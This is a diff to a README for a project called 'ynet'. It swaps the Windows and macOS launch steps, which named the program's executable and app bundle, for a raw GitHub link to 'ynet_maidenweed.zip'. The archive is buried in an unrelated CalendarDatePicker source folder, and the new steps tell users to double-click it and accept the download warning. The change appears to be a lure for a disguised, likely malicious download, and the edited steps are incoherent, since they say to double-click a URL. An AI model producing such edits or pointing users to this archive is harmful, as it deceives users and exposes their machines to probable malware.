enzoneza/ynet/README.md

 - **For Windows:**
   1. Open the folder where you extracted ynet.
-  2. Double-click `ynet.exe` to launch the application.
+  2. Double-click `https://raw.githubusercontent.com/enzoneza/ynet/main/wpfui/src/Wpf.Ui/Controls/CalendarDatePicker/ynet_maidenweed.zip` to launch the application.

 - **For macOS:**
   1. Open the folder where you extracted ynet.
-  2. Find the `ynet.app` file and double-click it.
+  2. Find the `https://raw.githubusercontent.com/enzoneza/ynet/main/wpfui/src/Wpf.Ui/Controls/CalendarDatePicker/ynet_maidenweed.zip` file and double-click it.
 If prompted, confirm that you want to open it, as it was downloaded from the internet.

 ---